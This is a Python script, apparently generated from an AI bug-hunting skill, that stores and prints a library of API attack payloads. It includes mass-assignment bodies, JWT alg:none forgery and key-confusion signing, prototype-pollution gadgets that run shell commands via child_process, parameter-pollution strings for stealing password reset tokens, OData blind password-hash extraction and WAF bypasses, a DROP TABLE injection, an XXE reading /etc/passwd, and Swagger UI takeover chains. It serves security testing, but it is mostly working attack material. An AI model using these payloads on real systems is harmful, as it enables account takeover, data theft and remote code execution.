#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
AUTO-GENERATED from Cybermes skill: claude-bughunter/hunt-api-misconfig

Skill: Get server's public key from /.well-known/jwks.json
Desc : Hunt API security misconfiguration — mass assignment, prototype pollution, HTTP verb tampering. Mass assignment: send {is_admin:true, role:admin, verified:true} on profile/account/reset endpoints — server blindly applies. JWT signature/crypto forging (alg:none, key confusion, kid/jku) is owned by hunt-jwt-crypto; this skill covers only non-crypto JWT handling. Prototype pollution: __proto__ injection in JSON merge / Object.assign / lodash _.merge → polluted prototype reaches sink (RCE in Node, XSS in browser). HTTP verb: GET-bypass-CSRF, X-HTTP-Method-Override, TRACE enabled. Detection: API responses with extra fields, JWTs in headers (decode at jwt.io). CORS misconfiguration (reflect-any-origin, null origin, subdomain-regex bypass, postMessage) is owned by hunt-cors. Use when hunting API misconfigs, mass-assignment, prototype pollution (JWT crypto → hunt-jwt-crypto).

Run:  python claude-bughunter-hunt-api-misconfig.py --help
      python claude-bughunter-hunt-api-misconfig.py --list
      python claude-bughunter-hunt-api-misconfig.py --dump <section>
"""
import sys, json, argparse

NAME = 'claude-bughunter/hunt-api-misconfig'
TITLE = "Get server's public key from /.well-known/jwks.json"
DESCRIPTION = 'Hunt API security misconfiguration — mass assignment, prototype pollution, HTTP verb tampering. Mass assignment: send {is_admin:true, role:admin, verified:true} on profile/account/reset endpoints — server blindly applies. JWT signature/crypto forging (alg:none, key confusion, kid/jku) is owned by hunt-jwt-crypto; this skill covers only non-crypto JWT handling. Prototype pollution: __proto__ injection in JSON merge / Object.assign / lodash _.merge → polluted prototype reaches sink (RCE in Node, XSS in browser). HTTP verb: GET-bypass-CSRF, X-HTTP-Method-Override, TRACE enabled. Detection: API responses with extra fields, JWTs in headers (decode at jwt.io). CORS misconfiguration (reflect-any-origin, null origin, subdomain-regex bypass, postMessage) is owned by hunt-cors. Use when hunting API misconfigs, mass-assignment, prototype pollution (JWT crypto → hunt-jwt-crypto).'

PAYLOADS = {
    'main': ["name: hunt-api-misconfig", "description: \"Hunt API security misconfiguration \u2014 mass assignment, prototype pollution, HTTP verb tampering. Mass assignment: send {is_admin:true, role:admin, verified:true} on profile/account/reset endpoints \u2014 server blindly applies. JWT signature/crypto forging (alg:none, key confusion, kid/jku) is owned by hunt-jwt-crypto; this skill covers only non-crypto JWT handling. Prototype pollution: __proto__ injection in JSON merge / Object.assign / lodash _.merge \u2192 polluted prototype reaches sink (RCE in Node, XSS in browser). HTTP verb: GET-bypass-CSRF, X-HTTP-Method-Override, TRACE enabled. Detection: API responses with extra fields, JWTs in headers (decode at jwt.io). CORS misconfiguration (reflect-any-origin, null origin, subdomain-regex bypass, postMessage) is owned by hunt-cors. Use when hunting API misconfigs, mass-assignment, prototype pollution (JWT crypto \u2192 hunt-jwt-crypto).\""],
    '12-api-security-misconfiguration': [],
    'mass-assignment': ["```javascript", "User.update(req.body)  // body has {\"role\": \"admin\"} \u2192 privilege escalation"],
    'jwt-none-algorithm': ["```python", "header = {\"alg\": \"none\", \"typ\": \"JWT\"}", "payload = {\"sub\": 1, \"role\": \"admin\"}", "token = base64(header) + \".\" + base64(payload) + \".\"  # no signature"],
    'jwt-rs256-hs256-algorithm-confusion': ["```python"],
    'get-server-s-public-key-from-well-known-jwks-json': [],
    'sign-token-with-public-key-as-hmac-secret': ["token = jwt.encode({\"sub\": \"admin\", \"role\": \"admin\"}, pub_key, algorithm=\"HS256\")"],
    'server-uses-rs256-key-as-hs256-secret-accepts-it': [],
    'prototype-pollution': ["```javascript", "// Server-side \u2014 Node.js merge without protection", "{\"__proto__\": {\"admin\": true}}", "{\"constructor\": {\"prototype\": {\"admin\": true}}}", "// URL: ?__proto__[isAdmin]=true&__proto__[role]=superadmin", "For server-side prototype pollution, hunt for an object merge primitive first, then a sink. Favor", "JSON/object update endpoints such as profile, address, preferences, settings, cart, admin job, import,", "or webhook configuration. Do not stop at a 200 response to `__proto__`; prove that polluted prototype", "state reaches a later operation.", "Hunt sequence:", "1. **Find an object-update endpoint.** Prefer endpoints that accept many named fields or JSON objects.", "Try both JSON and form encodings when the app accepts forms. Include CSRF/session fields when needed.", "2. **Pollute harmless marker properties.** Send variants such as:", "{\"__proto__\":{\"polluted\":\"pp-1337\"}}", "{\"constructor\":{\"prototype\":{\"polluted\":\"pp-1337\"}}}", "__proto__[polluted]=pp-1337", "constructor[prototype][polluted]=pp-1337", "3. **Trigger a separate sink.** After pollution, request account/profile/admin/job/export/search/render", "endpoints and compare with baseline. Strong signals include changed JSON defaults, unexpected fields,", "server errors mentioning object properties, changed job output, template/render errors, or command/job", "behavior changes.", "4. **Escalate only through learned sinks.** Candidate properties depend on the sink:", "{\"__proto__\":{\"json spaces\":10}}", "{\"__proto__\":{\"status\":555}}", "{\"__proto__\":{\"isAdmin\":true,\"role\":\"admin\"}}", "{\"__proto__\":{\"shell\":\"/bin/bash\",\"argv0\":\"node\",\"NODE_OPTIONS\":\"--inspect\"}}", "{\"__proto__\":{\"execArgv\":[\"--eval\",\"process.mainModule.require('child_process').execSync('id')\"]}}", "5. **For exfiltration labs or real impact, prefer non-destructive proof.** If an admin job, diagnostic,", "export, or rendering endpoint consumes polluted defaults, use a marker or environment/secret read only", "when authorized. In production, stop at a controlled marker unless scope explicitly permits data access."],
    'server-side-parameter-pollution-in-backend-url-rest-url-construction': ["Use this when a frontend form or endpoint appears to call a server-side API on your behalf", "(password reset, account lookup, profile fetch, product lookup, stock check, search). The bug is not", "ordinary client-side query pollution. The server takes your input and interpolates it into a backend", "URL path or query string, such as:", "/api/internal/users/<username>/field/email", "/api/users/<id>", "/api/users?username=<username>&field=email", "Hunt sequence:", "1. **Find the flow and read the client request.** Fetch the page and any referenced JavaScript. Look", "for form actions, `fetch(...)`, hidden CSRF fields, and the exact parameter name the browser sends.", "If there is a reset/account form, test known usernames first to learn the normal success/error shape.", "2. **Determine whether input lands in a backend path or query.** Send URL metacharacters in the input:", "`#`, `?`, `&x=y`, `/`, `../`, and encoded forms `%23`, `%3f`, `%26x=y`, `%2f`, `%2e%2e%2f`.", "Distinct errors such as `Invalid route`, `API definition`, `unsupported field`, or changed returned", "fields mean your value is being interpreted by a server-side URL router, not merely validated as text.", "3. **Use path traversal to move inside the server-side URL.** If `username/../other-user` changes the", "referenced account, the input is in a REST path segment. Then try appending route fragments such as", "`/field/email`, `/field/id`, `/field/username`, `/field/passwordResetToken`, and terminate the rest", "of the original backend path with `#` or `%23` when the backend URL parser honors fragments.", "4. **Discover API documentation from errors.** When an error says to consult the API definition, probe", "common documentation/spec paths: `/openapi.json`, `/swagger.json`, `/api-docs`, `/api/swagger.json`,", "`/swagger/v1/swagger.json`, `/v3/api-docs`, and path-traversal variants that attempt to reach the", "spec from the vulnerable backend route. A spec or descriptive route error tells you valid resources", "and field names.", "5. **Exploit only to prove impact.** For password reset/account lookup flows, the strongest proof is a", "sensitive field such as a reset token or secret for another user, then using that token in the normal", "application flow to complete account takeover. Do not stop at `Invalid route`; use errors as routing", "feedback.", "Payload patterns to try, adapted to the observed parameter name:", "username=administrator%23", "username=administrator%3f", "username=administrator%2f..%2fvictimuser", "username=administrator/../victimuser", "username=administrator/field/email%23", "username=administrator/field/id%23", "username=administrator/field/passwordResetToken%23", "username=administrator%2ffield%2fpasswordResetToken%23"],
    'cors-exploitation': ["```bash"],
    'test-reflected-origin-credentials': ["curl -s -I -H \"Origin: https://evil.com\" https://target.com/api/user/me"],
    'if-access-control-allow-origin-https-evil-com-access-control-allow-credentials-true': [],
    'critical-attacker-reads-credentialed-responses': [],
    'odata-filter-select-expand-waf-blacklist-bypass-2024-2026-surface': ["OData (Open Data Protocol) is the query layer behind **SharePoint, Microsoft Dynamics 365 / Power Platform, SAP NetWeaver Gateway / Fiori,** and any ASP.NET WebAPI project using `Microsoft.AspNetCore.OData`. It exposes SQL-shaped query operators (`eq`, `ne`, `and`, `or`, `substringof`, `startswith`, `tolower`, `concat`, `replace`) that look SQL-ish but are NOT SQL \u2014 meaning keyword-blacklist WAFs routinely fail open on OData traffic."],
    'attack-class-1-boolean-logic-blind-extraction-via-startswith-substringof': ["GET /_api/data/contacts?$filter=startswith(adx_identity_passwordhash,'a')", "GET /_api/data/contacts?$filter=startswith(adx_identity_passwordhash,'aa')", "Iterate prefix character-by-character; cardinality of the response (or `@odata.count`) is the boolean oracle that confirms the prefix is correct. No SQLi engine needed, no `'`/`--` characters \u2014 the WAF sees only legitimate OData keywords. Extracted Microsoft Dynamics 365 / Power Apps Portals **password hashes, names, emails, addresses, financial data** in Dec 2023; Microsoft patched May 2024. ([Stratus Security writeup](https://www.stratussecurity.com/post/critical-microsoft-365-vulnerability), [The Hacker News coverage Jan 2025](https://thehackernews.com/2025/01/severe-security-flaws-patched-in.html))"],
    'attack-class-2-orderby-select-column-disclosure-bypass': ["GET /api/data/v9.0/contacts?$orderby=emailaddress1 desc&$select=fullname", "`$orderby` accepts column names the user has no `$select` permission for, but the engine still sorts on them \u2014 the returned order leaks the protected column. Column-level ACLs are enforced on the projection (`$select`) but NOT on `$orderby` / `$filter` \u2014 same protected column, different code path. Second Stratus finding in the same Dynamics 365 disclosure; \"more dangerous than the first because it directly returned the data\" per Stratus."],
    'attack-class-3-batch-multipart-mixed-per-request-waf-signatures-miss-sub-operations': ["POST /odata/$batch  Content-Type: multipart/mixed; boundary=batch_1", "--batch_1", "Content-Type: application/http", "GET Users?$filter=1 eq 1 HTTP/1.1", "--batch_1--", "WAFs that scan only the outer request body (or that don't natively parse `multipart/mixed`) skip every inner operation. ModSecurity refused `multipart/mixed` historically ([Issue #3296](https://github.com/owasp-modsecurity/ModSecurity/issues/3296)); F5 added native batch parsing only in Advanced WAF v16.1 ([F5 SAP-Fiori advisory](https://www.f5.com/company/blog/securing-sap-fiori-http-batched-requests-odata-with-f5-advance)). The 2025 WAFFLED paper ([arXiv 2503.10846](https://arxiv.org/html/2503.10846v1)) generalises the parsing-discrepancy bypass class across 5 major WAFs."],
    'attack-class-4-encoded-non-canonical-operator-keyword-blacklist-bypass': ["GET /api?%24filter=Name%20eq%20'x'%20or%201%20eq%201   # URL-encoded $", "GET /api?%2524filter=...                                # double-encoded", "GET /Users(1)/$value                                    # path-segment style", "Mixed-case operators (`Eq`, `EQ`) and obscure ones (`substringof`, `tolower`, `concat`, `replace`) look unlike `SELECT`/`UNION` so SQLi-keyword signatures never fire. WAFs that key on the literal string `$filter` see neither form \u2014 but the OData server normalises both before evaluating the predicate. Documented since Kalra Black Hat AD 2012; canonical OData-vs-WAF impedance mismatch. ([OWASP Double Encoding](https://owasp.org/www-community/Double_Encoding))"],
    'attack-class-5-odata-real-sqli-when-library-passes-filter-raw': ["$filter=Name eq 'x'); DROP TABLE Users--'", "Only triggers when the OData layer string-concatenates into SQL instead of using LINQ. Documented in [OData/WebApi Issue #2352](https://github.com/OData/WebApi/issues/2352). The XML-deserialisation variant: **CVE-2019-17554** (Apache Olingo OData 4.0.0-4.6.0, XXE via `<!DOCTYPE foo [<!ENTITY x SYSTEM \"file:///etc/passwd\">]>` in `application/xml` body, CVSS 7.5). DoS variant: **CVE-2018-8269** (Microsoft.Data.OData deep `$filter` recursion \u2192 stack overflow)."],
    'bonus-expand-navigation-property-idor': ["GET /Orders?$expand=Customer($expand=PaymentMethods($expand=Card))", "Authorisation decorators applied to top-level entity sets; the engine joins along navigation properties without re-checking ACL on the joined entity. Same root cause as the 2021 PowerApps Portals 38M-record mass leak ([UpGuard writeup](https://www.upguard.com/breaches/power-apps))."],
    'detection-heuristics': ["- Response headers: `OData-Version: 4.0` / `DataServiceVersion: 3.0`; URL paths `/_api/`, `/odata/`, `/_vti_bin/`, `/api/data/v9.x/`, `/sap/opu/odata/`.", "- Try `$metadata` \u2192 if anonymous, the full schema (entity sets, navigation properties, function imports) is yours.", "- Probe each entity set with `$filter=1 eq 1`, `$top=1`, `$select=*`, then `$orderby=<column-you-shouldnt-see>` for column-level ACL.", "- Send the same payload three ways (`$filter=`, `%24filter=`, `%2524filter=`) and through `$batch` \u2014 divergent WAF behaviour confirms the parser-discrepancy bug."],
    'nswag-swagger-openapi-spec-exposure-2024-2026-surface': ["NSwag is the Swagger/OpenAPI toolchain for ASP.NET Core. Default routes (`/swagger`, `/swagger/v1/swagger.json`, `/swagger/index.html`) ship enabled in many .NET 6/7/8 projects and developers leave them on in production. The exposed spec discloses every endpoint, HTTP methods, parameter names + types + formats + max-lengths, models, validation rules \u2014 a complete attack-map in JSON."],
    'default-discovery-paths-cross-references-web2-recon': [],
    'nswag-swashbuckle-asp-net-core': ["/swagger, /swagger/index.html, /swagger/v1/swagger.json, /swagger/v2/swagger.json, /swagger/v3/swagger.json", "/swagger-ui, /swagger-ui/, /swagger-ui.html, /api-docs", "/nswag, /nswag/index.html, /api/swagger, /api/swagger.json, /api/openapi.json"],
    'generic-openapi': ["/openapi, /openapi.json, /openapi.yaml, /.well-known/openapi.json"],
    'java-spring-springfox-springdoc': ["/v2/api-docs, /v3/api-docs, /v3/api-docs.yaml, /swagger-resources"],
    'python-fastapi-connexion': ["/docs, /redoc, /openapi.json"],
    'quarkus': ["/q/openapi, /q/swagger-ui"],
    'graphql-adjacent': ["/graphql, /graphiql, /playground, /altair, /voyager", "Tools: `kiterunner` natively eats OpenAPI; `sj` (Swagger Jacker), `apidetector`, `XSSwagger`."],
    'attack-chains': ["**A. Spec disclosure \u2192 mass IDOR / BOLA.** Spec lists every `GET /api/v1/users/{userId}/...`. `jq '.paths | keys' swagger.json` \u2192 swap `{userId}` for victim's ID via Autorize/`ffuf -mc 200`. Common case: spec leaks `/api/admin/users/{id}/reset-password` documented but missing `[Authorize(Roles=\"Admin\")]` on the controller \u2014 low-priv ATO.", "**B. Spec disclosure \u2192 mass-assignment payload construction.** `components.schemas.UserUpdateDto` enumerates every model field including `isAdmin`, `emailVerified`, `tenantId`, `role`. Attacker copies the schema verbatim into `PATCH /users/me` and adds the privileged fields. Server's `[FromBody]` binder accepts them when DTOs aren't split into read-vs-write models.", "**C. Hidden endpoints.** Specs document `/internal/*`, `/debug/*`, `/v0/*`, `/legacy/*` routes that no front-end UI references. Reachable but uncovered by WAF rules and often skipped during auth reviews.", "**D. Swagger UI configUrl takeover.** Swagger UI loads its config from `?configUrl=`. If unsanitised, attacker hosts an evil OpenAPI spec, sends victim a link to the *legitimate* Swagger UI with `?configUrl=https://evil/spec.json`. Spec routes point back at the legitimate origin so the victim's \"Try It Out\" clicks fire same-origin authenticated requests. ([HackerOne #3124103 \u2014 U.S. DoD Swagger UI Injection, May 2025](https://hackerone.com/reports/3124103))"],
    'disclosed-cases': ["- **CVE-2018-25031** \u2014 Swagger UI \u2264 4.1.2 spec-injection via URL parameter; affects org.webjars:swagger-ui broadly (embedded in Swashbuckle and NSwag bundles).", "- **Swagger UI DOM XSS (3.14.1 \u2192 3.38.0)** \u2014 outdated bundled DOMPurify + remote-spec-load \u2192 arbitrary JS in victim browser ([Vidoc Security Lab writeup](https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers), [PortSwigger Daily Swig](https://portswigger.net/daily-swig/widespread-swagger-ui-library-vulnerability-leads-to-dom-xss-attacks)). Reported live on PayPal, Atlassian, Microsoft, GitLab, Yahoo.", "- **HackerOne #3124103** \u2014 U.S. Department of Defense, Swagger UI Injection (May 2025).", "- **HackerOne #2534300** \u2014 Ionity GmbH, HTML injection in Swagger UI.", "- **HackerOne #1656650** \u2014 Reflected XSS via Swagger UI `url=` parameter.", "- **CloudSEK threat-intel (2024)** \u2014 actors abuse exposed `swagger-ui` to invoke a verified-business WhatsApp send-message endpoint, impersonating the company to its customers. 6,000+ exposed Swagger UI instances on Shodan at time of writing. ([CloudSEK report](https://www.cloudsek.com/threatintelligence/threat-actors-use-exposed-swagger-ui-to-misuse-a-companys-endpoints-and-target-customers))", "- **CVE-2023-38337** \u2014 `rswag` (Ruby Swagger toolchain) directory traversal \u2014 reminder that the spec endpoint is itself an attack surface."],
    'detection-checklist': ["1. httpx-probe every path above across the full subdomain set; flag 200 with `Content-Type: application/json` AND body matching `\"swagger\"` or `\"openapi\"`.", "2. For every hit: `jq '.paths | keys' swagger.json` \u2192 feed to kiterunner / Autorize.", "3. `jq '.components.schemas' swagger.json` \u2192 mass-assignment field candidates.", "4. Banner the Swagger UI HTML for version string; map to the CVE-2018-25031 / DOM-XSS table.", "5. Test `?configUrl=` and `?url=` parameter handling on every Swagger UI hit."],
    'related-skills-chains': ["- **`hunt-ato`** \u2014 Mass assignment on signup/profile is the fastest path to admin. Chain primitive: API mass assignment + `hunt-ato` \u2192 `role=admin` set on signup \u2192 ATO via privileged role on first login.", "- **`hunt-auth-bypass`** \u2014 JWT flaws collapse the entire auth layer. Chain primitive: JWT `alg=none` + `hunt-auth-bypass` \u2192 impersonate any user by setting `sub` to victim ID, no signature required.", "- **`hunt-rce`** \u2014 Prototype pollution gadgets in Node.js dependencies (lodash, mongoose, jQuery) reach `child_process.spawn`. Chain primitive: Prototype pollution (`__proto__.shell=true`) + `hunt-rce` (Node.js gadget chain) \u2192 RCE on the API node.", "- **`hunt-subdomain`** \u2014 CORS regex with wildcard subdomain trusts a takeoverable host. Chain primitive: CORS allowlist `*.target.com` + subdomain takeover \u2192 attacker-controlled origin reads credentialed API responses.", "- **`security-arsenal`** \u2014 Load the JWT Attack Payloads section (alg=none, kid path traversal, JWK injection, embedded JWK) and the Mass-Assignment Field Wordlist (`is_admin`, `role`, `verified`, `permissions`, `org_id`, `tenant_id`).", "- **`triage-validation`** \u2014 Apply the Server-Policy-vs-State gate: a permissive CORS header alone is informational; demonstrate actual cross-origin credentialed read of sensitive data before reporting."],
}

def main():
    ap = argparse.ArgumentParser(description=DESCRIPTION, formatter_class=argparse.RawDescriptionHelpFormatter)
    ap.add_argument("--list", action="store_true", help="list sections")
    ap.add_argument("--dump", metavar="SECTION", help="dump payloads for a section")
    ap.add_argument("--search", metavar="KEYWORD", help="search payloads")
    args = ap.parse_args()
    if args.list or not (args.dump or args.search):
        print("=== %s ===" % TITLE)
        print(DESCRIPTION)
        print()
        print("Sections (%d):" % len(PAYLOADS))
        for k in PAYLOADS:
            print("  -", k, "(%d payloads)" % len(PAYLOADS[k]))
        if args.list:
            return
    if args.dump:
        if args.dump not in PAYLOADS:
            print("Section not found. Available:", list(PAYLOADS.keys()))
            sys.exit(1)
        for p in PAYLOADS[args.dump]:
            print(p)
        return
    if args.search:
        q = args.search.lower()
        hits = 0
        for k, v in PAYLOADS.items():
            for p in v:
                if q in p.lower():
                    print("[%s] %s" % (k, p))
                    hits += 1
        print("\n%d hits" % hits)
        return

if __name__ == "__main__":
    main()